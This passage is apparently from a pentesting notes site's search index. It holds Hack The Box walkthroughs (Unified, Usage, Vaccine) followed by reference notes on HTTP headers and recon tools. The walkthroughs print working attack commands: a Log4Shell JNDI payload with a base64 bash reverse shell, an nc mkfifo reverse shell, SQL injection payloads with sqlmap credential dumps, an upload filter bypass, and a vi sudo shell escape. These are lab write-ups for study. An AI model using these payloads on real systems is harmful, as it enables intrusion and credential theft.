                        sudo apt install openjdk-11-jre maven\n\n\n\ngit clone https://github.com/veracode-research/rogue-jndi \n\ncd rogue-jndi\n\nmvn package\n\n# Once it's build, make a reverse shell in base64 with attacker machine and listening port\necho 'bash -c bash -i >&/dev/tcp/10.10.14.2/4444 0>&1' | base64\n# This will return: YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK\n\n# Get out of rogue-jndi folder and\njava -jar rogue-jndi/target/RogueJndi-1.1.jar --command \"bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}\" --hostname \"10.129.96.149\"\n# In the bash command, copy paste your reverse shell in base64\n# --hostname: Victim IP\n

                        Now, open a terminal, launch netcat abd the listening port you defined in your payload.

                        With Burpsuite, get a request for login:

                        POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":false,\"strict\":true}\n

                        As we can read from the Unifi version exploit, the injectable parameter is \"remember\". So we insert there our payload and with Repeater, send the request:

                        POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":\"${jndi:ldap://10.10.14.2:1389/o=tomcat}\",\"strict\":true}\n

                        Once we send that request, our jndi server will resend the reverse shell:

                        And in our terminal with the nc listener we will get the reverse shell. Spawn it with:

                        SHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n

                        user.txt is under /home/michael/

                        ","tags":["walkthrough","log4j","jndi","mongodb"]},{"location":"htb-unified/#privilege-escalation","title":"Privilege escalation","text":"

                        Do some basic reconnaissance:

                        whoami\nid\ngroups\nsudo -l\nuname -a\n

                        Also we can see /etc/passwd to see other existing services/users.

                        ``bash cat /etc/passwd

                        Results:\n
                        root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin unifi:x:999:999::/home/unifi:/bin/sh mongodb:x:101:102::/var/lib/mongodb:/usr/sbin/nologin
                        After user unifi, we have a mondodb service. Also, we knew that under unifi version 6.4.54, it we could get access to the administrator panel of the UniFi application and possibly extract SSH secrets used between the appliances. \n\n[See mongodb cheat sheet](27017-27018-mongodb.md). \n\nFirst thing, find out on which port is running the service:\n
                        ps aux | grep mongo
                        Results: \n
                        unifi 67 0.4 4.2 1103744 85568 ? Sl 11:44 0:46 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1 unifi 5183 0.0 0.0 11468 1108 pts/0 S+ 14:47 0:00 grep mongo
                        Port 27117. Let's interact with the MongoDB service by making use of the mongo command line utility and attempting to extract the administrator password. A quick Google search using the keywords UniFi Default Database shows that the default database name for the UniFi application is ace.\n\nFrom the terminal of the victim's machine:\n\n```bash\nmongo --port 27117 ace --eval \"db.admin.find().forEach(printjson);\"\n# mongo: To use mongo interactive command line\n# --port: Indicate the port\n# ace: default database in mongo\n# --eval: evaluate JSON\n

                        And now we have...

                        MongoDB shell version v3.6.3\nconnecting to: mongodb://127.0.0.1:27117/ace\nMongoDB server version: 3.6.3\n{\n        \"_id\" : ObjectId(\"61ce278f46e0fb0012d47ee4\"),\n        \"name\" : \"administrator\",\n        \"email\" : \"administrator@unified.htb\",\n        \"x_shadow\" : \"$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.\",\n        \"time_created\" : NumberLong(1640900495),\n        \"last_site_name\" : \"default\",\n        \"ui_settings\" : \n``\n\nThe output reveals a user called administrator. Their password hash is located in the x_shadow variable but in this instance it cannot be cracked with any password cracking utilities. Instead we can change the x_shadow password hash with our very own created hash in order to replace the administrators password and authenticate to the administrative panel. To do this we can use the mkpasswd command line utility. The $6$ is the identifier for the hashing algorithm that is being used, which is SHA-512 in this case, therefore we will have to make a hash of the same type.\n\n```bash\nmkpasswd -m sha-512 lalala \n

                        It returns: $6$bTJCdmWvffwcSm9p$6FHYn1fesp3WjZesRG20dDQ/bp6Vktrq8aLylXvil8tApzFCguM2MEii63Uemf8BE7jBrB5ZcZwes85JpuXPq0

                        With that, now we can update the administrator password. From the terminal of the victim's machine:

                        mongo --port 27117 ace --eval 'db.admin.update({\"_id\":\nObjectId(\"61ce278f46e0fb0012d47ee4\")},{$set:{\"x_shadow\":\"$6$bTJCdmWvffwcSm9p$6FHYn1fesp3WjZesRG20dDQ/bp6Vktrq8aLylXvil8tApzFCguM2MEii63Uemf8BE7jBrB5ZcZwes85JpuXPq0\"}})'\n# ObjectId is the one that correlates with the administrator one.\n

                        Now, in the admin panel from the browser enter the new credentials for administrator.

                        When logged into the dashboard, grab ssh credentials for root user from Settings>Site, tab \"Device Authentication\", SSH Authentication.

                        With those credentials, access via ssh connection.

                        ","tags":["walkthrough","log4j","jndi","mongodb"]},{"location":"htb-usage/","title":"Walkthrough - Usage, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-usage/#about-the-machine","title":"About the machine","text":"data Machine Usage Platform Hackthebox url link OS Linux Difficulty Easy Points 20 ip 10.10.11.18","tags":["walkthrough"]},{"location":"htb-usage/#getting-usertxt-flag","title":"Getting user.txt flag","text":"","tags":["walkthrough"]},{"location":"htb-usage/#enumeration","title":"Enumeration","text":"
                        sudo nmap -sV -sC $ip -p-\n

                        Results: Port 22 and 80.

                        ","tags":["walkthrough"]},{"location":"htb-usage/#browsing-the-app","title":"Browsing the app","text":"

                        After entering in http://10.10.11.18, a dns error is displayed. The page is redirected to http://usage.htb.

                        I will add that line in my host resolver config file.

                        # testing for an existing file\necho \"10.10.11.18    http://usage.htb\" >> /etc/hosts\n

                        The application is simple. A Login pannel with a \"Remember your password\" link. An other links to an admin login pannel and a logout feature. Enumeration techniques also gives us some ideas about Laravel framework being in use.

                        After testing the login form and the remember your password form, I can detect a SQL injection vulnerability in the remember your password form.

                        Previously I registered a user lala@lala.com.

                        Payloads for manual detection:

                        lala@lala.com' AND 1=1;-- -\n

                        lala@lala.com' AND 1=1;-- -\n

                        Now, we know that we have a SQL injection, Blind with the AND Boolean technique, so we can use sqlmap with --technique flag set to BUT. We can also save time using the flag --dbms to indicate that is a mysql database:

                        sqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch --dbs --dump --threads 3\n\nsqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog --tables --dump --threads 3\n\nsqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog -T admin_users --dump --threads 3\n
                        ","tags":["walkthrough"]},{"location":"htb-usage/#upload-a-reverse-shell","title":"Upload a reverse shell","text":"

                        The admin profile can be edited. The upload feature for the avatar image is vulnerable.

                        First, I tried to upload a php file, but files extensions are sanitized client side.

                        Then, I uploaded a php reverse shell file using jpg extension. The file was uploaded but it was not executable.

                        Finally I used Burpsuite and intercepted the upload of my ivan.jpg file. During the interception I modified the extension to php.

                        Finally the reverse shell worked. But for a limited period of time (see steps 1 and 2). Time enough to set up a hook and establish a new connection (see steps 2 and 3) with a bash reverse shell

                        rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 4444 >/tmp/f\n

                        ","tags":["walkthrough"]},{"location":"htb-usage/#getting-usertxt","title":"Getting user.txt","text":"

                        First, I spawned a shell:

                        SHELL=/bin/bash script -q /dev/null\n

                        and printed out the flag:

                        cat /home/dash/user.txt\n
                        ","tags":["walkthrough"]},{"location":"htb-usage/#getting-roottxt","title":"Getting root.txt","text":"

                        First, I perform a lateral movement to the other user present in the machine. For that I cat the /etc/passwd file and I run linpeas.sh script in the machine.

                        ","tags":["walkthrough"]},{"location":"htb-usage/#lateral-movement","title":"Lateral movement","text":"

                        Enumerate other users with access to a bash terminal:

                        cat /etc/passwd | grep -E ^*/bin/bash$\n

                        Results:

                        root:x:0:0:root:/root:/bin/bash\ndash:x:1000:1000:dash:/home/dash:/bin/bash\nxander:x:1001:1001::/home/xander:/bin/bash\n

                        Upload the script linpeas to the victims machine.

                        ################\n# In the attacker machine\n###############\n# Download the script from the release page\ncurl https://github.com/peass-ng/PEASS-ng/releases/download/20240414-ed0a5fac/linpeas.sh\n\n# Copy the file to the root of your apache server\ncp linpeas.sh /var/wwww/html\n\n# Start your server \nservice apache2 start\n# Turn it off once you have served your file\n\n################\n# From the victim machine\n################\n# Download the script from the release page or from the attacker server\nwget http://attackerIP/linpeas.sh\n\n# Run the script\nchmod +x linpeash.sh\n./linpeas.sh\n

                        Some interesting takeaways from the linpeas.sh results:

                        ","tags":["walkthrough"]},{"location":"htb-vaccine/","title":"Vaccine - A HackTheBox machine","text":"

                        nmap -sC -sV $ip -Pn\n
                        Two open ports: 21 and 80

                        Also, from nmap analysys, ftp service at 21 allows us to use anonymous signin with empty password:

                        ftp $ip\n\n# enter user \"anonymous\" and hit enter when prompted for password\n
                        dir\n# listed appears file backup.zip\n\nget *\n

                        Try to open zip file, but it's password protected, so we crak it with johntheripper:

                        zip2john nameoffile.zip > zip.hashes\ncat zip.hashes\njohn zip.hashes\n# Proceeding with wordlist:/usr/share/john/password.lst\n# 741852963        (backup.zip)    \n\n\n#Unzip file:\nunzip backup.zip\n\n# Echo index file\ncat index.php\n

                        Before the html code there is a piece of php starting the session. Username and password are hard encoded there:

                        <?php\nsession_start();\n  if(isset($_POST['username']) && isset($_POST['password'])) {\n    if($_POST['username'] === 'admin' && md5($_POST['password']) === \"2cb42f8734ea607eefed3b70af13bbd3\") {\n      $_SESSION['login'] = \"true\";\n      header(\"Location: dashboard.php\");\n    }\n  }\n?>\n

                        In crackstation.net, we obtain that the hash \"2cb42f8734ea607eefed3b70af13bbd3\" was md5 encrypted and that actual password is \"qwerty789\"

                        With this, open browser and enter username and password. You will be redirected to: htpp://$ip/dashboard.php

                        Search box triggers a error message on frontend when introducing simple quotation mark as imput \"'\":

                         ERROR: unterminated quoted string at or near \"'\" LINE 1: Select * from cars where name ilike '%'%' ^\n

                        This tells us about a sql injection vulnerability.

                        # Ask for backend DBMS\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch      \n\n#---------\n# [11:03:27] [INFO] the back-end DBMS is PostgreSQL\n#web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (eoan or focal)\n#web application technology: Apache 2.4.41\n#back-end DBMS: PostgreSQL\n\n\n\n# Ask for databases\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --dbs\n\n# ------\n# [11:06:12] [INFO] fetching database (schema) names available databases [3]:\n# [*] information_schema\n# [*] pg_catalog\n# [*] public\n\n\n\n# Ask for tables in db pg_catalog\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch -D pg_catalog --tables\n\n# Response contains 62 tables. \n\n\n# Ask for users\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --users \n\n# -----\n# [11:10:16] [INFO] resumed: 'postgres'\n# database management system users [1]:\n# [*] postgres\n\n\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch -D pg_catalog -T pg_user -C passwd,usebypassrls,useconfig,usecreatedb,usename,userepl,usesuper,usesysid,valuntil --dump\n\n\n\n# Ask for passwords\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=kcr9helek579t5cjcldcbb5fc1\" --batch --passwords --dump\n\n# -----\n# database management system users password hashes:\n# [*] postgres [1]:\n#    password hash: md52d58e0637ec1e94cdfba3d1c26b67d01\n

                        First 3 characters are a tip about the hash. Using https://md5.gromweb.com/?md5=2d58e0637ec1e94cdfba3d1c26b67d01 we obtain: The MD5 hash: 2d58e0637ec1e94cdfba3d1c26b67d01 was succesfully reversed into the string: P@s5w0rd!postgres

                        Now, as we couldn't spot port 5432 (postgres) open, we will use port-tunneling with ssh.

                        ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We will listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client will forward the connection to the remote server on port 22. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from any given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n\nssh postgres@10.129.95.174 -L 1234:localhost:5432\n

                        After this, we can \"cat\" the user.txt file.

                        To escalate provileges, first we can use some commands for basic reconnaissance:

                        whoami\nid\nsudo -l\n

                        Last one provides us with interesting output:

                        User postgres may run the following commands on vaccine:\n    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf\n

                        We can abuse suid binaries technique to gain access to root user:

                         sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf\n:set shell=/bin/sh\n:shell\n

                        Once there, print out root flag:

                        cat /root/root.txt\n
                        ","tags":["walkthrough"]},{"location":"http-headers/","title":"HTTP headers","text":"Tools
                        • Curl

                        HTTP (Hypertext Transfer Protocol) is a stateless application layer protocol used for the transmission of resources like web application data and runs on top of TCP.

                        It was specifically designed for communication between web browsers and web servers.

                        HTTP utilizes the typical client-server architecture for communication, whereby the browser is the client, and the web server is the server.

                        Resources are uniquely identified with a URL/URI.

                        HTTP has 3 versions; HTTP 1.0, HTTP 1.1., and HTTP/2. And HTTP/3 in on its way.

                        • HTTP 1.1 is the most widely used version of HTTP and has several advantages over HTTP 1.0 such as the ability to re-use the same TCP connection, take advantage of the 3 ways handshake that was performed and request for multiple URI\u2019s/Resources in that connection.
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#structure-of-a-http-request","title":"Structure of a HTTP request","text":"

                        Request Line: The request line is the first line of an HTTP request and contains the following three components:

                        HTTP method (e.g., GET, POST, PUT, DELETE, etc.): Indicates the type of request being made.\nURL (Uniform Resource Locator): The address of the resource the client wants to access.\nHTTP version: The version of the HTTP protocol being used (e.g., HTTP/1.1).\n

                        Request Headers: they provide additional information about the request. Common headers include:

                        User-Agent: Information about the client making the request (e.g., browser type).\nHost: The hostname of the server.\nAccept: The media types the client can handle in the response (e.g., HTML, JSON).\nAuthorization: Credentials for authentication, if required.\nCookie: Information stored on the client-side and sent back to the server with each request.\n
                        GET /home/ HTTP/2\nHost: site.com\nCookie: session=cookie-value-00000-00000\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nDnt: 1\nSec-Gpc: 1\n

                        Request Body (Optional): Some HTTP methods (like POST or PUT) include a request body where data is sent to the server, typically in JSON or form data format.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#http-verbs-or-methods","title":"HTTP verbs (or methods)","text":"","tags":["pentesting HTTP headers"]},{"location":"http-headers/#structure-of-a-http-response","title":"Structure of a HTTP response","text":"

                        Response headers: Similar to request headers, response headers provide additional information about the response. Common headers include:

                        Content-Type: The media type of the response content (e.g., text/html, application/json).\nContent-Length: The size of the response body in bytes.\nSet-Cookie: Used to set cookies on the client-side for subsequent requests.\nCache-Control: Directives for caching behavior.\n

                        Response Body (Optional): The response body contains the actual content of the response. For example, in the case of an HTML page, the response body will contain the HTML markup.

                        In response to the HTTP Request, the web server will respond with the requested resource, preceded by a bunch of new HTTP response headers. These new response headers from the web server will be used by your web browser to interpret the content contained in the Response content/body of the response.

                        An example:

                        HTTP/1.1 200 OK\nDate: Fri, 13 Mar 2015 11:26:05 GMT\nCache-Control: private, max-age=0\nContent-Type: text/html; charset=UTF-8\nContent-Encoding: gzip\nServer: gws\nContent-Length: 258\n
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#date-header","title":"Date header","text":"

                        The \"Date\" header in an HTTP response is used to indicate the date and time when the response was generated by the server. It helps clients and intermediaries to understand the freshness of the response and to synchronize the time between the server and the client. This is used in a blind SQLinjection, to see how long it takes for the server to respond.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#status-code","title":"Status code","text":"

                        The status code can be resume in the following chart:

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#content-type","title":"Content-Type","text":"

                        The \"Content-Type\" header in an HTTP response is used to indicate the media type of the response content. It tells the client what type of data the server is sending so that the client can handle it appropriately.

                        List of all content-type headers

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#cache-control","title":"Cache-control","text":"

                        Cache-control: Cache-control is a header used to specify caching policies for browsers and other caching services. Specifically, the\u00a0Cache-Control\u00a0HTTP header field holds\u00a0directives\u00a0(instructions) \u2014 in both requests and responses \u2014 that control caching in browsers and shared caches (e.g. Proxies, CDNs).

                        Why this configuration is considered safe? Cache-control: no-store, no-cache, max-age=0. - The max-age=N response directive indicates that the response remains fresh until N seconds after the response is generated. - The no-cache response directive indicates that the response can be stored in caches, but the response must be validated with the origin server before each reuse, even when the cache is disconnected from the origin server. - The no-store response directive indicates that any caches of any kind (private or shared) should not store this response.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#server-header","title":"Server header","text":"

                        The Server header displays the Web Server banner, for example, Apache, Nginx, IIS etc. Google uses a custom web server banner: gws (Google Web Server).

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#set-cookie","title":"Set-Cookie","text":"

                        From geeksforgeeks: \"The\u00a0HTTP header Set-Cookie\u00a0is a response header and used to send cookies from the server to the user agent. So the user agent can send them back to the server later so the server can detect the user.\"

                        # The cookie name have to avoid this character ( ) @, ; : \\ \u201d / [ ] ? = { } plus control characters, spaces, and tabs. It can be any US-ASCII characters.\nSet-Cookie: <cookie-name>=<cookie-value>\n\n# This directive defines the host where the cookie will be sent. It is an optional directive.\nSet-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>\n\n# It is an optional directive that contains the expiry date of the cookie.\nSet-Cookie: <cookie-name>=<cookie-value>; Expires=<date>\n\n# Forbids JavaScript from accessing the cookie, for example, through the\u00a0`Document.cookie`\u00a0property. Note that a cookie that has been created with\u00a0`HttpOnly`\u00a0will still be sent with JavaScript-initiated requests, for example, when calling\u00a0`XMLHttpRequest.send()`\u00a0or\u00a0`fetch()`. This mitigates attacks against cross-site scripting XSS.\nSet-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n\n# It contains the life span in a digit of seconds format, zero or negative value will make the cookie expired immediately.\nSet-Cookie: <cookie-name>=<cookie-value>; Max-Age=<number>\n\nSet-Cookie: <cookie-name>=<cookie-value>; Partitioned\n\n# This directive define a path that must exist in the requested URL, else the browser can\u2019t send the cookie header.\nSet-Cookie: <cookie-name>=<cookie-value>; Path=<path-value>\n\nSet-Cookie: <cookie-name>=<cookie-value>; Secure\n\n# This directives providing some protection against cross-site request forgery attacks.\n# Strict means that the browser sends the cookie only for same-site requests, that is, requests originating from the same site that set the cookie. If a request originates from a different domain or scheme (even with the same domain), no cookies with the\u00a0`SameSite=Strict`\u00a0attribute are sent.\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=Strict\n\n# Lax means that the cookie is not sent on cross-site requests, such as on requests to load images or frames, but is sent when a user is navigating to the origin site from an external site (for example, when following a link). This is the default behavior if the\u00a0`SameSite`\u00a0attribute is not specified.\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=Lax\n\n# means that the browser sends the cookie with both cross-site and same-site requests. The\u00a0`Secure`\u00a0attribute must also be set when setting this value, like so\u00a0`SameSite=None; Secure`\n\nSet-Cookie: <cookie-name>=<cookie-value>; SameSite=None; Secure\n\n// Multiple attributes are also possible, for example:\nSet-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Secure; HttpOnly\n
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#understanding-samesite-attribute","title":"Understanding SameSite attribute","text":"

                        Differences between SameSite and SameOrigin: we will use the URL\u00a0http://www.example.org\u00a0 to see the differences more clearly.

                        URL Description same-site same-origin http://www.example.org Identical URL \u2705 \u2705 http://www.example.org:80 Identical URL (implicit port) \u2705 \u2705 http://www.example.org:8080 Different port \u2705 \u274c http://sub.example.org Different subdomain \u2705 \u274c https://www.example.org Different scheme \u274c \u274c http://www.example.evil Different TLD \u274c \u274c

                        When thinking about\u00a0SameSite\u00a0cookies, we're only thinking about \"same-site\" or \"cross-site\".

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#cors-cross-origin-resource-sharing","title":"CORS - Cross-Origin Resource Sharing","text":"

                        Cross-Origin Resource Sharing\u00a0(CORS) is an\u00a0HTTP-header based mechanism that allows a server to indicate any\u00a0origins\u00a0(domain, scheme, or port) other than its own from which a browser should permit loading resources.

                        For security reasons, browsers restrict cross-origin HTTP requests initiated from scripts.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#x-xss-protection","title":"X-XSS-Protection","text":"

                        The HTTP\u00a0X-XSS-Protection\u00a0response header is a feature of Internet Explorer, Chrome and Safari that stops pages from loading when they detect reflected cross-site scripting XSS attacks.

                        Syntax

                        # Disables XSS filtering.\nX-XSS-Protection: 0\n\n# Enables XSS filtering (usually default in browsers). If a cross-site scripting attack is detected, the browser will sanitize the page (remove the unsafe parts).\nX-XSS-Protection: 1\n\n# Enables XSS filtering. Rather than sanitizing the page, the browser will prevent rendering of the page if an attack is detected.\nX-XSS-Protection: 1; mode=block\n\n# Enables XSS filtering. If a cross-site scripting attack is detected, the browser will sanitize the page and report the violation. This uses the functionality of the CSP report-uri\u00a0directive to send a report.\nX-XSS-Protection: 1; report=<reporting-uri>\n
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#strict-transport-security","title":"Strict-Transport-Security","text":"

                        The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) informs browsers that the site should only be accessed using HTTPS, and that any future attempts to access it using HTTP should automatically be converted to HTTPS.

                        Directives

                        # The time, in seconds, that the browser should remember that a site is only to be accessed using HTTPS.\nmax-age=<expire-time>\n\n# If this optional parameter is specified, this rule applies to all of the site's subdomains as well.\nincludeSubDomains \n

                        Example:

                        Strict-Transport-Security: max-age=31536000; includeSubDomains\n

                        Additionally, Google maintains an HSTS preload service (used also by Firefox and Safari). By following the guidelines and successfully submitting your domain, you can ensure that browsers will connect to your domain only via secure connections. While the service is hosted by Google, all browsers are using this preload list. However, it is not part of the HSTS specification and should not be treated as official. Directive for the preload service is:

                        # When using preload, the max-age directive must be at least 31536000 (1 year), and the includeSubDomains directive must be present.\npreload\n

                        Sending the\u00a0preload\u00a0directive from your site can have\u00a0PERMANENT CONSEQUENCES\u00a0and prevent users from accessing your site and any of its subdomains if you find you need to switch back to HTTP.

                        What OWASP says about HSTS response header.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#exploitation","title":"Exploitation","text":"

                        Site owners can use HSTS to identify users without cookies. This can lead to a significant privacy leak. Take a look\u00a0here\u00a0for more details.

                        Cookies can be manipulated from sub-domains, so omitting the\u00a0includeSubDomains\u00a0option permits a broad range of cookie-related attacks that HSTS would otherwise prevent by requiring a valid certificate for a subdomain. Ensuring the\u00a0secure\u00a0flag is set on all cookies will also prevent, some, but not all, of the same attacks.

                        So... basically HSTS addresses the following threats:

                        • User bookmarks or manually types\u00a0http://example.com\u00a0and is subject to a man-in-the-middle attacker: HSTS automatically redirects HTTP requests to HTTPS for the target domain.
                        • Web application that is intended to be purely HTTPS inadvertently contains HTTP links or serves content over HTTP: HSTS automatically redirects HTTP requests to HTTPS for the target domain
                        • A man-in-the-middle attacker attempts to intercept traffic from a victim user using an invalid certificate and hopes the user will accept the bad certificate: HSTS does not allow a user to override the invalid certificate message
                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#https","title":"HTTPS","text":"

                        HTTPS (Hypertext Transfer Protocol Secure) is a secure version of the HTTP protocol, which is used to transmit data between a user's web browser and a website or web application.

                        HTTPS provides an added layer of security by encrypting the data transmitted over the internet, making it more secure and protecting it from unauthorized access and interception.

                        HTTPS is also commonly referred to as HTTP Secure. HTTPS is the preferred way to use and configure HTTP and involves running HTTP over SSL/TLS.

                        SSL (Secure Sockets Layer) and TLS (Transport Layer Security) are cryptographic protocols used to provide secure communication over a computer network, most commonly the internet. They are essential for establishing a secure and encrypted connection between a user's web browser or application and a web server.

                        HTTPS does not protect against web application flaws! Various web application attacks will still work regardless of the use of SSL/TLS.(Attacks like XSS and SQLi will still work)

                        The added encryption layer only protects data exchanged between the client and the server and does stop attacks against the web application itself.

                        ","tags":["pentesting HTTP headers"]},{"location":"http-headers/#tools","title":"Tools","text":"","tags":["pentesting HTTP headers"]},{"location":"http-headers/#security-headers","title":"Security Headers","text":"
                        • https://securityheaders.com/
                        ","tags":["pentesting HTTP headers"]},{"location":"httprint/","title":"httprint - A web server fingerprinting tool","text":"

                        httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask.

                        httprint can also be used to detect web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc.

                        httprint -P0 -h <target hosts> -s <signature file>\n# -P0 for avoiding pinging the host\n# -h target host\n# -s set the signature file to use\n
                        ","tags":["pentesting","enumeration","server enumeration","web server","fingerprinting"]},{"location":"httrack/","title":"HTTrack - A tool for mirrowing sites","text":"

                        HTTrack is a free (GPL, libre/free software) offline browser utility that allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.

                        HTTrack arranges the original site's relative link-structure. Simply open a page of the \"mirrored\" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.

                        ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"httrack/#installation","title":"Installation","text":"

                        Link to the project: https://www.httrack.com/.

                        sudo apt-get install httrack\n
                        ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"httrack/#basic-usage","title":"Basic usage","text":"

                        Create a folder for replicating in it your target.

                        mkdir targetsite\nhttrack domain.com  targetsite/\n

                        Interactive mode:

                        httrack\n
                        ","tags":["reconnaissance","scanning","passiverecon"]},{"location":"hugo/","title":"Hugo","text":""},{"location":"hugo/#install-hugo","title":"Install Hugo","text":"
                        sudo apt-get install hugo\n
                        "},{"location":"hugo/#hugo-basic-commands","title":"Hugo basic commands","text":"

                        Go to your project folder and creates a new site

                        hugo new site <name-project>\n

                        Initialize the repo

                        git init\n

                        Launch the server Hugo so you can open it in your http://localhost:1313

                        hugo server\n

                        Create new content, like for instance:

                        • A new chapter:
                        hugo new --kind chapter hugo/_index.md\n
                        • A new entry:
                        hugo new hugo/quick_start.md\n
                        "},{"location":"hydra/","title":"Hydra","text":"

                        Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol

                        ","tags":["pentesting","brute forcing","windows","passwords"]},{"location":"hydra/#basic-commands","title":"Basic commands","text":"
